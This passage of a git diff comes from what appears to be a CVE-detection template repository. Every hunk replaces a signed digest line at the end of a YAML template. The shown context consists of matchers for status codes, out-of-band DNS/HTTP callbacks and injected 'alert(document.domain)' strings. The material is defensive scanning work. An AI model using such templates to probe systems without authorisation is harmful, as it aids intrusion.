4a0a00473045022100fa6c46f3ea9e5f7d2bae513e6381eabbc1eaadc0f5ad35589cf1b870745d9454022013921393fd8a7402c1b3711fd2e5a038627b74fa1ca2a67150b5df26e6ac2f03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9415.yaml b/http/cves/2015/CVE-2015-9415.yaml index 886d0d9e752..1ca6c727b4e 100644 --- a/http/cves/2015/CVE-2015-9415.yaml +++ b/http/cves/2015/CVE-2015-9415.yaml @@ -58,4 +58,4 @@ http: - 'contains(body, "gd-jpeg")' - 'contains(content_type, "image/jpeg")' condition: and -# digest: 490a0046304402200470d723a4905b8190c24b9a580c3f1e6f56aac5a25f5068b39fa4561ff2423f022040160097efe0f1b55d0320f4fc5b1e6bc093d0a91b3639fe665771c20f12fa2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac806414819690ea94728d0bd64f3364dcf43bd9d70bef42c5984a5f9d0e58b4022100844b04f83b9706a729ed0e227378b86a1dfeba8dba056c9508b549fc4859e953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9499.yaml b/http/cves/2015/CVE-2015-9499.yaml index 897749975d7..72211612148 100644 --- a/http/cves/2015/CVE-2015-9499.yaml +++ b/http/cves/2015/CVE-2015-9499.yaml @@ -77,4 +77,4 @@ http: - "status_code == 200" - "contains(body,'{{marker}}')" condition: and -# digest: 4a0a00473045022100d69b75884ac8f15e8ba12844fe83b7a3cbc1d43b6089c615607736288ba0640102204471d4d99dcde65a9ad51f5f47337b8cac99919b78c52b26ede37d1bd5a6022a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008000ce8b7bb0ff39736ca6b263b702ffb2d0da50fee15385cee9787dc91dcd76022069bf1085edc190319ab61c97941eb37a76e19ff2ae8b15df94c7137f3824fb5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index c2ae236428b..e420862a71a 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5cb5195409c488ac452628a717c937855898a3a3d02662b0eacf920ae08afae02203f024b2da7a414a90f9181c9bef7403136a636aad827b5e26c98f3ef16ba742a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043967f2dbdcb2c5ca9a1f23bd127242c91dd9a648f5507c81d537cf0daad10040220210bdeb26fd2388ec222d2a22169cc0314d57d2ac2f2ec536e8e9b6762ec4693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index f4b88200189..22e1f53a70a 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220066308f5f335ce8758c3aaa3e64851b570bc05a2a0bdcb3120cb92438501bc7202206f7f2330313b04e35db35ac4eef22ad64dd8c6b2e2042bc05c993d57fef06e10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036ebb457ea326245a14c422de0040bb3e3a7207e12a3b87dcb4426efe11eca9d022100c1e598f3680fbbbf59365bb0b67cc44e6d5d9e0ee112f6e7bd0eb61415e36e80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index cdba523ecb2..61b350ed123 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022001ef181a6f9820448f2de51dcc20fa97cca692f68e4bd49bc1c54b15462895df02205cf9f1c080c1221adec44628be5f8bc8149869c5b4cad36a822fe10ad125aa6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f472aa5b18dc7e27e32917f84c71afa47c7a063b9269de41672436ec86bfef3f02205c2d9cc191a49425331b8896ccd7cf0be736ed87f1f7ff49567b39422032744c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 4885a1fa22c..134f3c1a016 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022012cc16a0317f0c39afb3f738080d9ba6a4dd77bbeecbcfbe167f37b9a24f302d0220153ea17cdd2c48ba2bfa527204b120e91298a65b44c3c0b1a2b29da84611a31f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8391277d3ca9e70ec69762c9b7707684947219724e398830b10a35d0ee2d5a50221009c875b039ee68c2c5a080c74690174c577794b0b6a6bce909241124070de424b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 79aaef9d297..6eefe87c608 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbd44c1e362c19253bf4fdeb627e2e77911e89ea616520ce1f4fa1865ac6a9aa022100c6eccc56f29169f1b238ae69da17168a60feac01c242d161701c9e43ef145c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051913c5d138dc15c452f9ef8aa6fbd752721eb5dc53d76250ec6ce9a5ee14f03022100a26a95787023df735ff6a437b0be0ce4eebb062f050a6081878f7c06ee91af88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index edf1395231d..835901568ce 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a35573072b41ccc71ec1aad92ec89121658273a07514b2374bfe167432243432022100d050c5e42f55480880c94e4258b1cd871be8f30ec349f26095688807836aff77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220159cc9fc74129a2346f0ed1bdc6f353749fdfed533716c33069bdc9d3adc3f0d02203fe7010f354024078df4bb935f6653e64a68b8849cbdf1bc8a31494a549acf65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index b8e3486d1cf..380f45c0127 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402210094eec7f472f16d3abb7621dd8880f44526c512436ae830009aeeb482a32c8d52021f35354680978d6990e8d5b9c14f7ef9b6e320a67cc5d2123553b5d122f9f0b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204c0efa71e4a28f795a1a1594bfbcfa0e2beaa36400d674ade55d325ef18e7c08022100b36bc43acf3cd03e5069f265384d896f44dfd585c41ae509d4fae650fb5631a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 17a1f856eef..9b10933324b 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a05f02b2906799ff0339a7b6f7211e346b0686e3428ea5b6af446957ff4630120220048342346df6a4fb343f7506d96d2c603edd533f7ecbaf1889735226eb0598b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088b546a8bc55b98166f6423d5ca4bd46977c692dfaa11b7ac12da6834fbb46f6022052ce2cb7bf4cda246eb0529a6cec52470dbb48dd7288945e455fa5659a1362f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index b619773f602..66dcb213288 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029cc12d3b5587394890f24847796c248dbf6858abe7c947fdf20e73ee2ecca0b0220117086cafff533b9e4da583a2e918d402426c669b012d240ec5731d70977b210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4c805827ce76153bfcfef2eb5a3488e09da228e04813e70dc28797e947c1ec40221008edd8f56146bb8c63836e96b429c3c81ed249c4219dbbb3ebf12cbd62f6ff242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index bea8f4e83bd..2f6fb631ff7 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f11fa786696ec9eb798fac0cd637cdf9af81f72a22ccb54b893d52174f16351602205a325728d09352805fb770acde5281ad03dbe7b2f40318772eebb0c9ddae74c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004f1ce92c2ae55c85b1243e6a82077fc4c43bb5ce49ec2a7dfdf86f77c7f1474022100b3d1123a12996d6a1fc2b521b9041b9d726fd5e725d272d0b7c1b47d089a4f64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 189ec34d285..3d86cfbe7ee 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b570bd061070569224bd1dda20e2593175bc6000d469ff36f65f2470e0cda50c0220566fd49a50064e8dec628059011374932f32fe9e130133a3cdfffd809e320125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055e97a5a21cbf1e239c0b8cbabead42e660f0beb66b988581e203b9cec6a3ba8022100c96ec2c8eab37f150660ab6d3f04021aa9f192ac2d28b9d64e76877376a01eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index a8cff33f059..abf8307c92f 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b23ba4eca2721f16b3a1fb4292907390dc513530213c98b18f5e6590d306b5a3022100970a4624996094f64e0e831d431b2419fb7d5be1c09956ce3e75bb7b20f91236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019454243ab9ceefb8c76939b96653c2ea148b7722aa3829322867e1d68f1db5e022100a01bc33d293889cee516e3a02d91636d064e7abd8043fd13a86e922ced32cd8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index e036ed98137..e4c8d1df530 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220346c5154381fa4cc990b832f32cf315f6289a1c99440c10565857dccad76e16a022100b6229c4705864a0d247e317bdd3039fbe7d3b34f7d677013e1ad835163f99e4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1e604e9ad08109775ae4d961600d6561e5fb16ff6fced8403801a526d77462b022100e7194693734cd54c76f42736b7e7a47c8b30af702ce6dc8aa2e79055f545a9fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index a9ab160c57a..ffec6525010 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100868c76127157e7b0a87d0ca2038b374f0afc883f468b12923988d58dad940a1802207f85ab557e9cf9a802ae9215eaffacf8502789f3cb1b44370686a97505246bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eaeec582b79ce8fbe659fc1c2771e7884f06e6d00577dab64c2e9cbb4b030695022100cb5555e02e45c359eb072941bd9fb7f50816e4d588a23cd885331908c66b07d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 5e32ba9302a..bb02c77f80b 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220372f38d041f4c60282dfa3cff01deb57ca48614713c030f19d4f35214c5849f4022100d9186981e99df06c6f9264db52cf7bbf9636a827aba806eef73cfb3b346dc8e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205552c2b5393e7ca6dfcd78dd1502cf3ce3ffa339d4946885d06f62fcb7da3aef02207e74a6616a8677d01fd49a6812e742288b2345cbfd9329b852cb22b3118ece0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index a0848726771..ad0adf4a725 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea8c5db41b49d7e9fc2c259c6dd696b687a84cc11460875de58aa92f1a4cac7702200e3e49f5502cf1577efdcf8b4f657c11a2937de15f6999488ad06ad8e0b99e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e4ca2aebe9e27aaeec56b466b7bacb6571693d78ed22ba0a5fc7e1ae1a9ee77022100d517bf6fefdce458dcfb10e8d7c163a6a521638bc02b701633ba5d858c0a140c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 24fd372c43e..971b514716a 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -65,4 +65,4 @@ http: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 4a0a00473045022050e09b7366416296cf4c89f0fe30cbf67ffb3dd60ffcdfc677692cad2ba8ff74022100a8892fd749879741f3adf9856eef8fbe137d7ac2191565b7a4a54ffb9367cdcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201038d81ed4ff4c48da48b4e4b20b5cb8f8f78e3c44ab1b73f66464deed1911ac022100c916a4a121be99f5edd10e120c8c13763f0ba229cc83dfd2e4bc6bc23a3dd26b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index ddbabc17949..360e1e8f596 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -45,4 +45,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 490a00463044022078155a85a1eb8e969ef3553a7f045669f8ba4f1c18dd80424fcf259455504e6e02206ab852c4bce57fec9d0d95d70a9c476cfac73563b3f48c76bba571cd57b5319f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb352395c5596637fd57097a7b85baad13eebd6704fc529447461dfe445b839a022045f121a0e9a3a6dc7e2435d8b3eb0f3520d29c469549e3b5b07a6cd8fe60043e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index d0dafda2fe5..421c1b0a781 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 404 -# digest: 490a0046304402202d2fe96c7df2e6dd43d9cc941bec6ffca89426c634a77c90c55745e2c1eebec7022032825e585230625eaaf816c1ad9f49c12d4b35a4fd75ceaacb3925573d2634ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8ab531a7b2de78487183d29635ae131e04e7e500f7b07da1ece235eae195b44022100c04b1476278f89a60cce072c58ec449cc5f8185b088bfa74ae6dd2b27436382c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 3ccc998ae69..e1a22626c8a 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502200b80d98114147857d4a2b35f20d3a9d5d867781c7c64b2a3b0b4217fda8b1f28022100c522bdbe86c0c1fc792e27a8b0db4bd163653ce1f2c99c8f75d96600508ee7fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6d417467406e25bd2480b2fb3e777a13e24cc0b771634d5c17cab2d8f658e31022013256bbb60b6947cbbb7460ff9d382e69371b359329132ab67b4cf9d909f990f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 26eaa0c902c..b57c425aed8 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")' - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")' condition: and -# digest: 4a0a00473045022017fce4343185c321497ac13f3e7fbf01e45b86daeed76370be624298421f587502210081daa6370d2134c1729f9a4c6e7e4a080b63169acaf6d50184daa67a4fb5f6d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6c5449bec0a114247970ff5dfb8bbac13cfd879a737ddff65b8493b36601157022100cdaa602f8b96784c751733888f224776281509308fa00ae8f18491b6894ab431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index fd85f35d83c..4d26d3503d4 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022025565acb1245a45cbdfddac037bea81cd2d17b91bf019d8698cf0fd01783b9eb02201d7d7ac4e40981eea0f43105954f3cbd10bb67420f16eca6b2d1050569de294a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a2446a54071f7b6a1612d66a4517679a8c8097065bc148b6a2a29803341d0ad022100875e0afee45b1a945ee7a5e7e0190b280b0b14f4ea25597df1c44b0b05b5b658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 22c20f9369f..433589dd83a 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 490a0046304402202fe72e01b7b3872411f618653bc9054a3a3d01b6f244a9a3794bcf238a29e5c602200d011fb26cb1fd270d0d4e5dad910568983c5ffff140ded1f3b9ea6452f9413f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da3addb35b36dc41c74e09a04dc71ab79bb90b5fd2898d38813bb124ef00a15b022036359fd7879983252bb33755441a9bf00dd30ca250053b869d73b5464c3d3052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10976.yaml b/http/cves/2016/CVE-2016-10976.yaml index 272f3032f43..0bcd01c1af8 100644 --- a/http/cves/2016/CVE-2016-10976.yaml +++ b/http/cves/2016/CVE-2016-10976.yaml @@ -60,4 +60,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "alert(document.domain)", "save_edit_js")' condition: and -# digest: 490a0046304402207b75544f33078c7e9da9ff6fa01109df6bfc2b351e8f798b689391512aa688b702207d28dd04bb4a30db2516780e1ae4bad1ae7b84879c605c3931f8133cdc2c763d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203115cb3aab4a73fe86ba852c4d5528fc135b7086a078034bcc2621e78567c38802200cc4f8149bb933c790a4cf413f92f216978863c1cb08b17b926e1396b7548c4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index bba02a49e21..e95623e4399 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210094761b56c39421c98614018bbf78fda25ffcc6ccceb977882ee47a8380a927fe02205bfd50f7973bbff174c257907d788531121967713ebb62206c7facb35a7faf0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017e1e7745f2d04fd3095dd1edf0b22c06748cfad9fb2dd731a19fce676ed39a402207df57e21d5d1ee7e6154457b59ee2e95a1008398f47bc8e7709b1d147501510c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-15042.yaml b/http/cves/2016/CVE-2016-15042.yaml index 2b7f0fbd6ac..fd44fa1c282 100644 --- a/http/cves/2016/CVE-2016-15042.yaml +++ b/http/cves/2016/CVE-2016-15042.yaml @@ -108,4 +108,4 @@ http: - 'contains_all(body_1, "{{filename}}","file_name")' - 'contains(body_2, "{{randstr_content}}")' condition: and -# digest: 4a0a00473045022046c6fd0ea8180b8093162a145720b6ee19f127e961fa02a6f656b741060dfcc4022100b0fa40c016eb564fa59cc3f356064718d94c137a960ff47e0b56c686769ff5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee6c9e1f4b62f3587cbc994b9c599ece6c524781bfbd5cea9d9afdedff4227cf0220246a6e2fecde2cf30829c01758342f5b9b4fdbe437ba71e47189ee0ad15223e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-15043.yaml b/http/cves/2016/CVE-2016-15043.yaml index 04f81b08a7a..2cec853c628 100644 --- a/http/cves/2016/CVE-2016-15043.yaml +++ b/http/cves/2016/CVE-2016-15043.yaml @@ -56,4 +56,4 @@ http: - status_code == 200 - regex('<body>(.*?)</body>', body) condition: and -# digest: 4b0a00483046022100ffee4f408500276fe303cf4d447a72144f9f9e6c949d2d082f48cf0c85be1bfa022100e553d5793ee5859da4db77f06c98d76d4b5891f39ac57ebcbdc8662580da9324:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039b719369ad5614780845e69c9bd2e9af42981b5dcbae639275bd0dd4d47b376022009aee18fc381760a9daf08cad79b578ce6e9e1adbbda7b9c1fd185964d6c3576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 77f1742bf9d..83378cb082d 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502200ca329f7179299f7092bf36e7efb38e0785cbf6dcf12393f43c36c813791154c02210095a9f0904232073960858385d1f689907e555cd39bbd990549aeafdbd967d9b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220765b8a51a924c5415d670a5a70577f8ec524c9ea11c3b9f2ac2518a080cd53ed02205047336e8e2c6adbc0c4a17c8f1af9ef4130d3ebd388801f345b8cf59b410c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 99cd099829e..42861c5647c 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - dns -# digest: 490a00463044022021f96b0eeeab51649b67741fd81b151ffd5b4c70e139fedd7172d52048ce72050220316d8c96617a7e7fe9a9e9649a09657edb960a4c4ffaac728b6f006a8cc0a2a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f7c7b8cb962cfdeff5b535724b3040a244e3458b63962d53950c4c79ed6b7cd02210085345902a47d1565a45942d30d456a708a19df97ae6811e6369af5576f96ab37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index 0c1071ec67f..bfc6ef548ec 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -54,4 +54,4 @@ http: regex: - '<b>Success "([a-z]+)"' part: body -# digest: 4a0a00473045022100edd1813fa7f32307f5ca09e8ba279770c78cb23484c80a7f926ad55d37b0de9b02203739a6cac69c44b92375911de3b5ce77a68933324a8bf9f2a06ac87550bc9d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077a03c948eb674e9c7f89e4fd2eb0415a7f8835507afe41fe1358db0f184a47902207243a627ecb398a81e33df1092cfbcbf8433a04fadc4e069d8a56570239f74b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 81f75c6e706..fa111559f05 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -67,4 +67,4 @@ http: - 200 - 503 condition: or -# digest: 4a0a00473045022100c7bd1a38d43881a347494cb92836d4524f1ba6c1d64b7e01a51d4966bba6cfe702205de90ee9ca344c1369c10c496d9f90886efa8b243896a095143425e369cb7f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205195fae60ae76aeb0f6ee5763baa9742e317e215547ebfbcdcaf0bfed4a6b7b5022100ea59278a7bde5df9c80fc751c8d8a741a09796a6bd0534f397f78c5fd88ef3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 7ddb57248a1..118af2e9958 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202204add30554dd4ef98e77493172996405b140556045b204c10ae4dfb51b9892022100f522a3e59a61b783035cf4ec2684189ab21605b575ad6295af14f09d8144d084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f024848b2bf2e4718fdd83e18a6ed07560be39a9464be7a7b2656369045cea0702206779c23b0a6cfe9e469120e475ee983f14c87422fabf4692fe42d98fd894cd65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-9299.yaml b/http/cves/2016/CVE-2016-9299.yaml index b2aa7e2883f..512b6c91a6d 100644 --- a/http/cves/2016/CVE-2016-9299.yaml +++ b/http/cves/2016/CVE-2016-9299.yaml @@ -126,4 +126,4 @@ code: - "contains(response,'hudson.remoting.UserRequest')" - 'contains(interactsh_protocol, "dns")' condition: and -# digest: 4a0a00473045022027b9fe00b585542625100f0c820c9c366c9a0eb6b15f1226075dfd364816323b022100b38bd3b468f6f5b4522c9f2192bc5fc173b8b1300353eb54c14793f8a034f45b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220313439e622d26baf2521771a8ffb4685ef14c9173433918f825445c5fc9b463c022037236d7f4fbf6268db3865131eff15f60a5862353b57dfe2348db96b06af3f92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index e61438b8ae2..cb63ce89223 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 500 -# digest: 